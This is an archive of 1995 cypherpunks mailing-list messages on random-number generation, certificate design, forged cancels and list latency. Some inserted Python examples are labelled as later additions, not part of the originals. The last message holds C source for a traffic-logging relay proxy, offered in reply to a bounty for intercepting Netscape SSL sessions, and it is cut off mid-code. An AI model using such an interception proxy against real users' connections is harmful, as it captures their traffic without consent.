> put it on a scintillating counter and got alpha hits at roughly
> half-microsecond intervals. It was a while ago, so I forget how this compared
> to the rating in Curies on the package. But that would be fine for a
> low-to-moderate bandwidth RNG.

I was thinking about this the other day and wondered if it wouldn't be
cheap and relatively easy to build a board that samples and sums
several randomly selected signals on various frequencies on the AM
broadcast spectrum.  This should catch stations in nearly all
metropolitan (and most rural areas as well) and would require that
someone be able to broadcast at multiple frequencies to "cheat" it.

Perhaps this would be affected by RF interference from the motherboard
itself.  If so, could the RF radiation from the motherboard itself be
used to generate random numbers?

-- 
Dave Dittrich                  Client Services, Computing & Communications
dittrich@cac.washington.edu    University of Washington

<a href="http://www.washington.edu/People/dad/">
Dave Dittrich / dittrich@cac.washington.edu</a>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 08:57:01 PDT
To: cypherpunks@toad.com
Subject: Certificate proposal
Message-ID: <9510021553.AA13756@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

X.509 certificates are not totally bad.  Their structure contains lessons
for anyone designing a certificate structure.  [Raw X.509 does not imply a
hierarchy, I believe.  Steve Kent & Co. do.]

However, there are also some serious problems with X.509 certs, aside from
their use of ASN.1.

Perhaps the biggest problem is the use of a name -- a text string (or some
abortion like the DN which can be reduced to a text string) -- as the
anchor point.

This anchor point needs to be unique.  Since it is just a text string, that
means that the certificate authority needs to guarantee uniqueness.
However, it is also supposed to stand for a unique individual.  Since it is
not that individual's DNA sequence -- it is not testable.  There has to be
machinery set up outside the certificate definition for binding this text
string to its individual.

		------------------------------

PGP certificates have the same problem.  In that case, it is an e-mail
address and name (by tradition) as the text string.  That needs to be bound
to some physical body.  If it is an e-mail name, there is some binding
enforced by whatever access mechanisms protect access to that e-mail
account.  However, that binding is weak and also outside the certificate
definition.

		------------------------------

Let me propose an alternative unique name: the public key (or a good hash
of it).  The public key has an advantage over both X.509 and PGP names.
The binding between it and its human being is testable.  You can challenge
the human in question to sign something.



Assuming you use a public key as the unique name, you end up with a much
simplified certificate.  In fact, the notion of "certificate" may go away,
in the sense that the certificate binds a key to a person through a unique
name.  The person binds himself to his key, on challenge (or on any message
signature).

What remains is a need for attributes to be bound to a key.  For example,
someone might testify that E0414C79B5AF36750217BC1A57386478 has brown hair,
is balding and wears a pony tail, by signing a message to that effect.
Someone else might sign a message stating that the person who owns the
private key of 61E2DE7FCB9D7984E9C8048BA63221A2 is authorized to spend
money from bank account number 07123 of Provident Savings in Columbia MD.
That latter signator needs to be verified as authorized to make such an
assertion -- and you end up with a certification chain -- but it is not
hierarchical like X.509 and it is not web-of-trust -- it is relational.  It
is not a chain binding key to person but key's person to attribute or
permission.  It goes directly to what we need to accomplish without the
middleman -- without stopping at a person in the middle.

I realize that if you want to revoke a key, then it might help to have
bindings be to something other than the key.  That way, you can change keys
out from under the binding.  However, every method I've examined for
accomplishing that has security weaknesses.  The best method I've found yet
has a very long signature key -- used only rarely (e.g., when acquiring an
attribute-certificate worth a great deal; and signing more transient keys) --
and never normally revoked (or, if revoked, causing a widespread
re-establishment of bindings -- like when you lose your wallet today).

		------------------------------

Current certificates are going down a fundamentally wrong path.  They are
trying to bind keys to people and let Society somehow bind attributes to
people -- but the latter binding is too weak to permit keys to be bound to
attributes or permissions.

The community will discover this, soon, but the farther we play along the
X.509 path (especially, but also the PGP path), the more inertia there will
be to overcome in trying to fix this problem.  I would therefore suggest
that the PGP development process address this issue now and continue the
established habit of taking the lead into sanity.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHAK8FQXJENzYr45AQFsdAP+JswAq/H4JIDE3+VlMsi87PBPCNBA7jg7
0ftkd8v7vrSSNda5aF+HVB7oKHylA/Lb90bvjMK7CKOJJ7aTzRP9IsAiz1i48FAR
LAeD59v5SAKmAhaTMMYSRyKFRRXEaqIdEoJW3XKQBJ57b8R38vWKjR/11eTtCKjV
joH4c5hhWmY=
=ayYh
-----END PGP SIGNATURE-----
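
Added example, not part of the original message or of any PGP or X.509 code: a Python rendering of the proposal above, in which a key's name is the hash of the public key, attributes are signed statements about key names, and the key-to-person binding is tested by challenge. Lamport one-time signatures over SHA-256 stand in for the RSA keys of the message (an assumption so that only the standard library is needed; each key therefore signs exactly once), and all function names and the attribute string are hypothetical.

```python
import hashlib
import json
import secrets


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


# --- Lamport one-time signatures (assumed stand-in for RSA; one signature per key) ---
def keygen():
    sk = [(secrets.token_bytes(32), secrets.token_bytes(32)) for _ in range(256)]
    pk = [(H(a), H(b)) for a, b in sk]
    return sk, pk


def key_name(pk) -> str:
    """The unique name is a hash of the public key, not a text string."""
    return H(b"".join(a + b for a, b in pk)).hex()


def _bits(msg: bytes):
    digest = H(msg)
    return [(digest[i // 8] >> (7 - i % 8)) & 1 for i in range(256)]


def sign(sk, msg: bytes):
    return [sk[i][bit] for i, bit in enumerate(_bits(msg))]


def verify(pk, msg: bytes, sig) -> bool:
    return len(sig) == 256 and all(
        H(sig[i]) == pk[i][bit] for i, bit in enumerate(_bits(msg)))


# --- Attribute statements bound to key names ---
def encode(body: dict) -> bytes:
    return json.dumps(body, sort_keys=True).encode()


def attest(issuer_sk, issuer_pk, subject_name: str, attribute: str) -> dict:
    """The issuer key signs: 'the key named subject_name has this attribute'."""
    body = {"issuer": key_name(issuer_pk), "subject": subject_name,
            "attribute": attribute}
    return {"body": body, "issuer_pk": issuer_pk,
            "sig": sign(issuer_sk, encode(body))}


def verify_chain(chain, trusted_name, subject_name, attribute) -> bool:
    """Walk from a key the verifier already trusts for this attribute down to
    the subject key. Every link but the last delegates the right to assert."""
    if not chain:
        return False
    expected_issuer = trusted_name
    for i, link in enumerate(chain):
        body, pk = link["body"], link["issuer_pk"]
        wanted = attribute if i == len(chain) - 1 else "may-assert:" + attribute
        if (key_name(pk) != body["issuer"]            # the name really is this key
                or body["issuer"] != expected_issuer  # issued by the previous subject
                or body["attribute"] != wanted
                or not verify(pk, encode(body), link["sig"])):
            return False
        expected_issuer = body["subject"]
    return expected_issuer == subject_name


# --- The testable binding: challenge the holder to sign something fresh ---
def prove_possession(sk, nonce: bytes):
    return sign(sk, b"challenge:" + nonce)


def check_possession(pk, claimed_name: str, nonce: bytes, sig) -> bool:
    return key_name(pk) == claimed_name and verify(pk, b"challenge:" + nonce, sig)


def demo() -> dict:
    attr = "spend:account-EXAMPLE-0001"       # constructed attribute string
    bank_sk, bank_pk = keygen()               # key the verifier trusts for attr
    officer_sk, officer_pk = keygen()
    alice_sk, alice_pk = keygen()
    mallory_sk, mallory_pk = keygen()
    alice, mallory = key_name(alice_pk), key_name(mallory_pk)

    chain = [attest(bank_sk, bank_pk, key_name(officer_pk), "may-assert:" + attr),
             attest(officer_sk, officer_pk, alice, attr)]
    # Same signature, subject swapped to another key name: must not verify.
    forged = dict(chain[1], body=dict(chain[1]["body"], subject=mallory))
    nonce = secrets.token_bytes(16)
    return {
        "chain_ok": verify_chain(chain, key_name(bank_pk), alice, attr),
        "forged_ok": verify_chain([chain[0], forged], key_name(bank_pk), mallory, attr),
        "possession_ok": check_possession(
            alice_pk, alice, nonce, prove_possession(alice_sk, nonce)),
        "impostor_ok": check_possession(
            mallory_pk, alice, nonce, prove_possession(mallory_sk, nonce)),
    }


if __name__ == "__main__":
    print(demo())
```

No link in the chain names a person: the verifier ends with "this key may spend from this account" and a fresh signature showing that whoever is present holds that key.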




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Mon, 2 Oct 95 08:55:20 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: More forged cancels (fwd)
Message-ID: <Pine.SUN.3.91.951002115347.17004B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


why is my mailbox full of stuff from mail.cypherpunks? 

****   PLEASE NOTE NEW E-MAIL ADDRESS: froomkin@law.miami.edu *********

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.

---------- Forwarded message ----------
Received: from relay3.UU.NET by law.miami.edu (4.1/3.1.012693-University of Miami Law School);
        id AA16017 for IFS=' '&&exec /home/faculty/froomkin/proc/procmail -t -f-||exit 75 #froomkin; Mon, 2 Oct 95 01:17:37 EDT
Received: from toad.com by relay3.UU.NET with SMTP
	id QQzjqz13374; Mon, 2 Oct 1995 01:16:43 -0400
Received: by toad.com id AA17355; Sun, 1 Oct 95 22:13:04 PDT
Received: from hudson.lm.com by toad.com id AA17346; Sun, 1 Oct 95 22:12:56 PDT
Received: (from news@localhost) by hudson.lm.com (8.6.11/8.6.9) id BAA09549 for cypherpunks@toad.com; Mon, 2 Oct 1995 01:15:28 -0400
Path: hudson.lm.com!news.math.psu.edu!news.cac.psu.edu!newsserver.jvnc.net!newsserver2.jvnc.net!howland.reston.ans.net!gatech!news.mathworks.com!newsxfer.itd.umich.edu!agate!news.Stanford.EDU!nntp-hub2.barrnet.net!news1.digital.com!decwrl!amd!netcomsv!uucp3.net
>From: orbit@ix.netcom.com (Michael R. Grabois)
Newsgroups: news.admin.net-abuse.misc,soc.culture.german,soc.culture.jewish,rec.radio.shortwave,alt.2600,mail.cypherpunks,alt.privacy.anon-server,alt.stop.spamming,alt.stop-spamming
Subject: Re: More forged cancels
Date: Mon, 02 Oct 1995 03:31:03 GMT
Organization: Netcom
Lines: 40
Message-Id: <44nmd0$q13@ixnews6.ix.netcom.com>
References: <44n926$2dj@sundog.tiac.net>
Reply-To: orbit@ix.netcom.com
Nntp-Posting-Host: ix-hou6-03.ix.netcom.com
X-Netcom-Date: Sun Oct 01 8:30:40 PM PDT 1995
X-Newsreader: Forte Free Agent 1.0.82
Xref: hudson.lm.com news.admin.net-abuse.misc:16173 soc.culture.german:76152 soc.culture.jewish:188004 rec.radio.shortwave:63171 alt.2600:125976 mail.cypherpunks:18586 alt.privacy.anon-server:4465
Apparently-To: cypherpunks@toad.com
Sender: owner-cypherpunks@toad.com
Precedence: bulk

On Sun, 01 Oct 1995 23:45:24 GMT, jbyrd@tiac.net (Jim Byrd) wrote: 

[snip]

>-----------------begin control message
>Path:
>sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!mn6.swip.net!seunet!news2..swip..net!plug..ne
>ws.pipex.net!pipex!tank.news.pipex.net!pipex!usenet.eel.ufl.edu!news.gmi..edu!msunews!netnew
>s.upenn.edu!ts7-28.upenn.edu!user
>From: 73323.603@compuserve.com
>Newsgroups: soc.culture.german,soc.culture.jewish
>Subject: cmsg cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>Date: Sun, 1 Oct 1995 17:56 GMT
>Organization: The National Alliance
>Message-ID: <cancel.73323.603-3009951517290001@ts7-28.upenn.edu>
>NNTP-Posting-Host: ts7-28.upenn.edu
>Approved: 73323.603@compuserve.com
>Control: cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>X-Cancelled-By: 73323.603@compuserve.com
>Lines: 1

>CANCELLED.

>----end control message

Does this mean that the cancel came from the Compuserve account?
Forging cancel notices is definitely against CIS rules, as is
unsolicited e-mail. I've already talked to a sysop there about it, and
he said he'd pass it along to the CIS Security folks.

If nothing else, that may get his account revoked. Hey, small
victories.



        Michael R. Grabois    | orbit@ix.netcom.com
        Houston, TX           | CI$: 74737,2600
-------------------------------------------------------
    Gravity. It's not just a good idea, it's the law.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 2 Oct 95 09:10:05 PDT
To: <cypherpunks@toad.com
Subject: Re: Yet Another "(Fwd) Internet  Euro-Clipper"
Message-ID: <9510021610.AA00160@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> At 5:12 PM 9/29/95, Peter Trei wrote:
> >Subject: European Governments Agree to Ban Strong Crypto

> The biggest problem I have with this is that this is the third, fourth, or
> fifth posting of Ross Anderson's piece to this list  [...]

> I urge people to read what's on the list and not repost things which have
> already appeared. If they don't have time to read all of the messages on
> the list, which is understandable, then they need to be even more careful
> in posting things.

Reading the list does not necessarily help - I experience a several hour lag between when
I post something, and when it comes back from the list server.  Thus, even if I'm all
caught up on my reading the list (as I was when I posted that article), articles may be 'in the
pipe' which duplicate ones I'm thinking of posting.

For those curious about the latency, I'm posting this at 12:08, on the US east coast.
How long did it take to reach you?

> 
> Not to pick on Peter Trei, as this happens all the time, whenever a hot
> issue appears.

Short of implementing some content-sensitive form of CSMA/CD, I don't see what we
can do (but lowering the list latency would help a lot).

> --Tim May

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Mon, 2 Oct 95 12:28:10 PDT
To: cypherpunks@toad.com
Subject: SSH random numbers
Message-ID: <Pine.3.89.9510021218.A7340-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


I have finally been goaded into using SSH. It seems like a
great tool, but I have one major worry. When I install
SSH, it generates the host key right away. When I run
ssh-keygen, it generates my user key right away.
Where is it getting the random numbers? Before I dive
into the source I was wondering if anyone else had
looked into this?

	-Lance 

no PGP sig because I am on a remote machine.

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 2 Oct 95 12:48:51 PDT
To: tcmay@got.net
Subject: Time Lag (was Re: Yet Another "(Fwd) Internet  Euro-Clipper")
Message-ID: <9510021945.AA16056@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 12:20 PM 10/2/95, Peter Trei wrote:
> 
> >For those curious about the latency, I'm posting this at 12:08, on the US
> >east coast.
> >How long did it take to reach you?
> 
> I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

I got it at 11:53 PDT.  I just checked the headers and the delay was split
in a couple of places.  (Correcting all times for PDT)

thunk              -> 9:10  -> alcor.process.com. (And they're off and running!)
alcor.process.com. -> 9:10  -> toad.com.          (delivered in 0 time:)
toad.com.          -> 11:29 -> relay3.uu.net.     (Sat on toad 2hrs, 19 min)
relay3.uu.net.     -> 11:54 -> mail2.pilot.net.   (Sat on relay3 25 mins )
mail2.pilot.net.   -> 11:53 -> verity.com.        (delivered into the past!)

Of course these delays can vary a few minutes either way because of
inaccuracies of time clocks on various machines.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Mon, 2 Oct 95 12:51:40 PDT
To: cme@TIS.COM>
Subject: Re: Certificate proposal & X509 clarifications
Message-ID: <9509028126.AA812663445@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        The Distinguished Name of X509 is NOT intended to be the
unique identifier of a person or a public key.  In the X509 world
two different DNs can have the same public key, and a single
DN can have multiple certificates with possibly different
public keys.  The same public key naturally appears in multiple
certificates when each certificate is only valid for a certain
period of time (e.g., weekly certificates have been proposed for
applications that do not want to implement revocation lists).
        The unique identifier in an X509 certificate is the
DN of the issuer and the serial number that the issuer attached
to the certificate.  Both of these fields appear in the version 1 X509
certificate.  Of course, this assumes that issuers are
following the rule of not issuing two certificates with the same
serial number.
        The designers of version 1 of the X509 certificate format
have realized that they need to allow issuers to attach all kinds
of different attributes to a public key.  This led to version 3
of the X509 format, which provides for general extensions.  Of course,
this means that there is more rope to hang yourself with when it
comes to designing an overall system, but with careful design,
lots of good things can be done.
        For example, for the S/MIME secure mail effort, the certificates
include the email address of the owner, as certified by the company
that is providing the email post office (e.g., the employer or
service provider).  Note that Netscape Navigator 2.x will support
Version 3 X509 certificates and S/MIME.

        Question: what's a good way to have the existing PGP public
key infrastructure interoperate with the X509 infrastructure?

                --Bob


                       





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 2 Oct 95 09:55:52 PDT
To: "Robert A. Rosenberg" <cypherpunks@toad.com
Subject: Re: WHERE did this come from?
In-Reply-To: <v02130505ac9508c98b3e@[166.84.254.3]>
Message-ID: <9510021655.AA07536@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>This is a KNOWN SPAM (it is currently being talked about in the Net-SPAM
>Usenet Newsgroup). It has been coming from 3 sites (one in Italy, one in
>France, and one in Germany). The national Police in all 3 countries (as
>well as the FBI) are apparently investigating it. To track the situation
>monitor this Web Page (Which should be Globally Accessible):

Does anyone know the officials who are investigating? I have some additional 
information. 

It appears that someone may have obtained the cypherpunks mailing list and used 
it as the basis for the Spam. This is a serious matter.


	Phill Hallam-Baker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Mon, 2 Oct 95 10:38:25 PDT
To: cypherpunks@toad.com
Subject: NT and C2
Message-ID: <Pine.BSD/.3.91.951002132703.28404A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



Here is the URL to an article in Network World by Winn Schwartau
entitled, "One expert shares his views on Microsoft security features."

http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7i/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/ExUP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8Di31MRmypd


If you need a username/password try cypherpunks/cypherpunks

Here is an excerpt:

 Since Microsoft Corp. products are usually robust, I was looking
forward to seeing what type of security features the company implemented in
Windows NT Workstation Version 3.5. But after walking through the system
with Microsoft product managers and developers, I was dismayed to find how
woefully short on security features Windows NT is.
     Despite the fact that the U.S. government is expected to certify
Windows NT as a secure operating system, Microsoft's first serious venture
into security is not very impressive. Windows NT may pass muster with the
federal government, but it does not meet the real-world security needs of
corporations running complex, heterogeneous networked environments.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 2 Oct 95 10:44:55 PDT
To: cypherpunks@toad.com
Subject: List latency.
Message-ID: <9510021744.AA01741@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 12:20 PM 10/2/95, Peter Trei wrote:
> 
> >For those curious about the latency, I'm posting this at 12:08, on the US
> >east coast.
> >How long did it take to reach you?
> 
> I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

Here's the relevant headers for the bounceback to me, which took an hour:

> Received: from relay3.UU.NET [192.48.96.8] by alcor.process.com
>            with SMTP-OpenVMS via TCP/IP; Mon, 2 Oct 1995 13:10 -0400
> Received: from toad.com by relay3.UU.NET with SMTP 
>  id QQzjst04916; Mon, 2 Oct 1995 12:51:05 -0400
> Received: by toad.com id AA00166; Mon, 2 Oct 95 09:10:05 PDT
> Received: from alcor.process.com by toad.com id AA00160; Mon, 2 Oct 95 09:10:02 PDT
> Message-Id: <9510021610.AA00160@toad.com>
> Received: from thunk [192.42.95.240] by alcor.process.com
>            with SMTP-OpenVMS via TCP/IP; Mon, 2 Oct 1995 12:10 -0400
> Date:          Mon, 2 Oct 1995 12:14:30 -6

Translating:

Sent by thunk.process.com        12:14 EDT
Received by alcor.process.com    12:10 EDT     -4 minutes (thunk's clock is off)
Received by toad                  9:10 PDT      0 minutes
Received by uunet                12:51 EDT     41 minutes
Received by alcor                13:10 EDT     19 minutes

It looks like there's a considerable delay entering and leaving uunet. I'm not sure which 
machine gets the blame, but it's either toad&uunet, or uunet&alcor.





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Mon, 2 Oct 95 14:22:16 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: One-Time-Pad generation from audio device
In-Reply-To: <Pine.3.89.9510021627.A14466-0100000@unicorn.com>
Message-ID: <Pine.OSF.3.91j.951002141954.21670A-100000@saul1.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Oct 1995, Rev. Mark Grant wrote:

> 
> Over the weekend I hacked up a one-time-pad generator from the random 
> number code I've been writing for Privtool, which uses noise from the 
> audio device to generate random numbers.
> 
> The code basically reads in a 512-byte block from /dev/audio, then takes
> the MD5 of that block to generate 16 bytes of the OTP. The raw audio data
> I'm getting is not particularly random and will compress by 3:1 using gzip
> or compress, so I'm assuming that using a 32:1 ratio here via MD5 will
> give a truly random output (it's certainly uncompressible).

I wouldn't bet on it. I did a similar hack with perl, with a much more
conservative 5 seconds to 32 bytes. That didn't cut it, when I ent'ed the
result it gave 6 bits of entropy / 8 bits of output.
I do recall posting it here.

> 
> Before I release the source code to the Net, can anyone give me any good
> reasons to believe that this won't produce physically random output, or
> make suggestions on how to test, or improve, the generated output ? There's
> a #define which can be used to easily increase the amount of data fed into
> the MD5, but at the moment it will only generate about 1 MB per hour on a
> Sparcstation (limited by the audio input rate), so I don't want to
> increase that if I don't have to. 

Um.. I would try to generate bits quickly, then securely, so for example
you get a 2k buffer and do it 5 sec / 128 bits. Then slow down and overwrite
the buffer and give warnings if the user wants to use the bits too early.

> 
> 	Mark
> 
> 
> 

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+--------------------------------------------------------------------------+
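
Added example, not taken from Privtool or from the perl hack mentioned above: a Python check of how much raw input a hash-distilled pad needs. It estimates entropy on the raw samples rather than on the MD5 output, because the output of a hash looks random whatever went in; the "quiet audio" sample is constructed, and every function name is hypothetical.

```python
import hashlib
import math
import random
from collections import Counter


def shannon_bits_per_byte(data: bytes) -> float:
    """Byte-histogram Shannon estimate, the usual 'bits per byte' figure."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def min_entropy_bits_per_byte(data: bytes) -> float:
    """Min-entropy from the most frequent byte value: the conservative figure.
    Assumes independent samples; correlated audio carries less than this."""
    return -math.log2(max(Counter(data).values()) / len(data))


def hashed_counter(blocks: int) -> bytes:
    """MD5 of 0, 1, 2, ...: a stream that contains no entropy at all."""
    return b"".join(hashlib.md5(i.to_bytes(8, "big")).digest()
                    for i in range(blocks))


def input_bytes_per_block(raw_sample: bytes, out_bits: int = 128,
                          safety: float = 2.0) -> int:
    """Raw bytes to feed the hash for each out_bits of pad, sized from the
    min-entropy of the raw source with a safety margin."""
    per_byte = min_entropy_bits_per_byte(raw_sample)
    if per_byte <= 0:
        raise ValueError("source shows no entropy; do not use it")
    return math.ceil(out_bits * safety / per_byte)


def constructed_quiet_audio(n: int = 8192, seed: int = 1995) -> bytes:
    """Constructed stand-in for /dev/audio with no signal: 8-bit samples
    wobbling a couple of steps around mid-scale."""
    rng = random.Random(seed)
    return bytes(128 + rng.randint(-2, 2) for _ in range(n))


def report() -> dict:
    raw = constructed_quiet_audio()
    needed = input_bytes_per_block(raw)
    return {
        "raw_shannon": shannon_bits_per_byte(raw),
        "raw_min": min_entropy_bits_per_byte(raw),
        # Near 8 bits/byte even though the input was a plain counter:
        "hashed_counter_shannon": shannon_bits_per_byte(hashed_counter(4096)),
        "bytes_per_md5_block": needed,
        "fits_in_512_byte_block": needed <= 512,
    }


if __name__ == "__main__":
    for name, value in report().items():
        print(name, value)
```

For a real device, feed `input_bytes_per_block` a capture of the raw samples taken with the input in its quietest state, since that is the least entropy the generator will ever see.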





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Mon, 2 Oct 95 14:27:04 PDT
To: jbass@dmsd.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <199510022126.OAA06234@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509301910.AA10970@dmsd.com> you write:
> 
> The "messenger attack" as described in my earlier posts regarding
> public key encryption and key management seems to apply to NetScape's SSL.
> I have a Fifty dollar bill for the first person to submit to the mail box
> nethack@dmsd.com a working Unix server (with cleartext session logs) which
> accepts all connections on a unix based host to the www port and redirects
> them to netscape.com leaving a clear text log of each session's SSL packets
> in /tmp by session.  All entries become the property of DMS Design. The winner
> and I will submit a claim for one of Community COnneXion's "I HACKED NETSCAPE"
> tee shirts as a server hack. (Have Fun!!)
> 

This is a trivial program!  I can't believe anyone considers this
technically difficult.  But hey, who am I to question, if you'll
pay $50!

Ok, let me back that up with real code.  Here's a proxy I've been
using for experimenting, in lieu of root access & tcpdump.

Usage: proxy localport remotehost remoteport > capturefile

Try:

$ ./proxy 2999 www.netscape.com 80 > capturefile &
$ netscape http://localhost:2999/home/welcome.html &

or

$ ./proxy 3999 alpha.mkn.co.uk 443 > capturefile &
$ netscape https://localhost:3999/ &

Here's the source.  It's a bit unstable, and could be improved
a little, but was fine for a quick kludge.  So feel free to send the
$50 to the following address at your convenience!! :-)

David Wagner
UC Berkeley
330 Soda Hall
Berkeley, CA  94720


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <ctype.h>

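/* dump bytes, sorta similar to tcpdump's style */
void dump(char *p, int len)
{
	int	i, j;

	while (len > 0) {
		/* hex column: up to 16 bytes, grouped in pairs */
		for (i=0; i<16 && i < len; i++) {
			printf("%2.2x", (unsigned char) p[i]);
			if (i & 1)
				printf(" ");
		}
		j = i;
		/* pad a short final row so the text column lines up */
		for (; i<16; i++) {
			printf("  ");
			if (i & 1)
				printf(" ");
		}
		printf("    # ");
		/* text column; cast so bytes >= 0x80 never reach isprint() as negative values */
		for (i=0; i<j; i++)
			printf("%c", (isprint((unsigned char) p[i])) ? p[i] : '.');
		printf("\n");

		len -= j; p += j;
	}
	printf("\n");
	fflush(stdout);		/* keep the capture file current if the proxy is killed */
}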

/* copy one message; guaranteed not to block */
int fromto(int from, int to)
{
	static char	buf[2048];
	int	len;

	len = read(from, buf, sizeof(buf));
	switch(len) {
		case 0:		return(0); /* EOF */
		case -1:	perror("read"); exit(1);
	}
	dump(buf, len);
	return(write(to, buf, len));
}

/* repeatedly copy both ways until either side closes */
void proxy(int xfd, int yfd)
{
	fd_set	fs;
	int	done = 0;
	int	nfds = (xfd > yfd ? xfd : yfd) + 1;	/* select() wants highest fd + 1 */

	while (!done) {
		FD_ZERO(&fs);
		FD_SET(xfd, &fs); FD_SET(yfd, &fs);
		if (select(nfds, &fs, NULL, NULL, (struct timeval *) 0) == -1) {
			perror("select"); exit(1);
		}
		if (FD_ISSET(xfd, &fs))
			if (fromto(xfd, yfd) <= 0)
				done = 1;
		if (FD_ISSET(yfd, &fs))
			if (fromto(yfd, xfd) <= 0)
				done = 1;
	}
}

/* resolve the remote host (name or dotted quad) and connect to it */
int remoteinit(char *addr, int port)
{
	struct sockaddr_in si;
	int fd;
	struct hostent *hp;
	char    hostname[MAXHOSTNAMELEN];

	memset(&si, 0, sizeof(struct sockaddr_in));
	si.sin_family = AF_INET;
	si.sin_addr.s_addr = inet_addr(addr);
	si.sin_port = htons(port);	/* port must be in network byte order */
	if (si.sin_addr.s_addr == INADDR_NONE)
		hp = gethostbyname(addr);
	else
		hp = gethostbyaddr((char *)&si.sin_addr.s_addr,
					sizeof(si.sin_addr.s_addr), AF_INET);
	if (hp == NULL) {
		fprintf(stderr, "unknown host %s\n", addr); exit(1);
	}
	si.sin_family = hp->h_addrtype;
	memcpy(&(si.sin_addr), hp->h_addr, hp->h_length);
	strncpy(hostname, hp->h_name, MAXHOSTNAMELEN-1);
	hostname[MAXHOSTNAMELEN-1] = '\0';	/* strncpy does not terminate on truncation */
 	if (si.sin_family == AF_INET)
		printf("Connecting to %s (%s)\n", hostname,
			inet_ntoa(*(struct in_addr *)&si.sin_addr.s_addr));
	else
		printf("Connecting to %s\n", hostname);

	if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket"); exit(1);
	}
